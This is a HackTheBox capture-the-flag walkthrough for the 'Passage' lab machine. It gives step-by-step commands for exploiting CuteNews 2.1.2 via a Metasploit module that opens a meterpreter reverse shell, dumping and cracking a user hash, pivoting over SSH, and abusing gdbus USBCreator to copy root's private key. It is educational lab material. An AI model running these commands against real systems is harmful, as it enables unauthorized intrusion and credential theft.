Passage HackTheBox WalkThrough

This is Passage HackTheBox machine walkthrough. In this writeup, I have demonstrated step by step how I rooted to Passage HTB machine. Before starting let us know something about this machine. It is Linux box with IP address 10.10.10.206 and security level medium assigned by its maker.

First of all, connect your local machine with VPN so that you can access to the lab machines and confirm the connectivity of passage machine by pinging the IP address 10.10.10.206. If all correct then start hacking.

As usual, I began by scanning the IP address so that I could get some starting points. Used nmap for this task and the result is below.

Scanning

$ nmap -sC -sV -oN passage_scan 10.10.10.206

Nmap revealed that port 22 and 80 is open. SSH server is running over port 22 and apache2 web server is running over port 80. As apache web server is running over port 80 so there must be some website hosted on this machine IP. Ongoing to URL http://10.10.10.206/ found a webpage showing Passage News.

Scrolling to the bottom got information Powered by : CuteNews. Then immediately googled about CuteNews and found that it is an Open Source Content Management System (CMS) for hosting news articles. Since, it is a CMS then there must be some user(s) who write blog post on this website. After spending sometimes got two email address [email protected] & [email protected].

So we have two users namely paul and nadav extracted from their emails. Added them to my notes. And proceeded for further enumeration. Checked the page-source by pressing CTRL+U and found URL http://10.10.10.206/CuteNews that is the installation folder of CuteNews. Ongoing to this page found register & login options and version of running CuteNews is 2.1.2.

As I get some information about any software or CMS then I immediately search for public exploits for that software. So used $searchsploit [a CLI tool to query exploit-db database] for searching exploit of CuteNews 2.1.2.

Searching Public Exploit

$ searchsploit CuteNews 2.1.2

There is a Remote Code Execution exploit for CuteNews 2.1.2 and it also has metasploit module. So launched metasploit to exploit this vulnerability. But, when searched for CuteNews in metasploit gave message No results found from search.

Since this module is not present in metasploit-framework so, we have to explicitly, download and add this exploit to our metasploit-framework. The exploit link is https://www.exploit-db.com/download/46698 . Followed the below steps to integrate the module in metasploit.

$msfdb run

msf5 > search cutenews

msf5 > wget 'https://www.exploit-db.com/download/46698'

msf5 > mv 46698 /usr/share/metasploit-framework/modules/exploits/unix/webapp/cutenews_avatar_rce.rb

We have to add comma [,] to this exploit because there is a syntax error in it, see this issue at rapid7 repo.

msf5 > vi /usr/share/metasploit-framework/modules/exploits/unix/webapp/cutenews_avatar_rce.rb

After adding the exploit and making changes we have to reload all modules.

msf5 > reload_all

msf5 > search cutenews

Now we have successfully added CuteNews RCE exploit to our metasploit-framework. After loading CuteNews module when used msf command $show options, to list available options, it also includes USERNAME & PASSWORD. So CuteNews 2.1.2 has actually an Authenticated RCE vulnerability because it requires username and password too. As we already have a register button at URL http://10.10.10.206/CuteNews so, registered a user by the name test1 & password test1.

It is time to get meterpreter shell. Used the above credential to get shell.

Getting Shell

msf5 > use exploit/unix/webapp/cutenews_avatar_rce

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set RHOSTS 10.10.10.206

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set payload php/meterpreter/reverse_tcp

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set LHOST 10.10.14.191

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set USERNAME test1

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set PASSWORD test1

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set VHOST 10.10.14.191

msf5 exploit(unix/webapp/cutenews_avatar_rce) > exploit

meterpreter > sysinfo

Note: If your meterpreter shell don’t work then background the shell and try to exploit again & again 3-4 times. Even if not works then use unstaged payload php/meterpreter_reverse_tcp instead of staged payload.

Got meterpreter shell. Upgraded the shell to fully qualified Linux shell so that I could run all linux command remotely.

Upgrading Shell

meterpreter > shell

~python -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm-256color

$ CTRL+Z //to background the shell

$ stty raw -echo

$ fg //plus two times enter to foreground the session

After some enumeration got a file named lines inside directory /var/www/html/CuteNews/cdata/users/. It contains information of all the users in base64 encoded form. After decoding found SHA256 hash of user paul.

$ cat /var/www/html/CuteNews/cdata/users/lines

paul : e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd

Luckily, got the password from Crackstation for this hash.

So we have credential paul : atlanta1

Switched the user to paul using the password atlanta1

$ su paul

~atlanta1

Capture User Flag

$ cat user.txt

Privilege Escalation

After some initial enumeration found that authorized_keys file of user paul contains key of user nadav. It means user paul can connect to user nadav locally via SSH.

$ ssh nadav@localhost

Successfully logged in to nadav through SSH. We are nadav now.

After some, more enumeration did not found any privilege escalation vector. So ran linpeas.sh [a post exploitation enumeration script] for help and it found gdbus could be used to escalate privilege. Did not know how to escalate privilege-using gdbus. So googled privilege escalation using gdbus and got this first article.

According to this article, gdbus allows a user to overwrite arbitrary files on the file system, as root, with no password prompting. Or we can say any user can copy content of root user without any password. So I used this command to copy id_rsa key of root user so that using this key I could SSH to root.

$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/key.txt true

$ cat /tmp/key.txt

We have got private key of user root. So copied this key inside the file root_key on my local PC. And after changing the permission of file root_key to 600 connected to root using SSH.

$ vi root_key

$ chmod 600 root_key

$ ssh -i root_key [email protected]

root@passage:~# whoami && id

We have successfully escalated the privilege to root. Now we can capture root flag.

Capture Root Flag

$ cat root.txt

This is how I rooted to Passage HackTheBox. Learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box. Thanks for reading this writeup. For any suggestion and query related to walkthrough, feel free to contact us at [email protected].

You can read walkthrough of similar machine from here.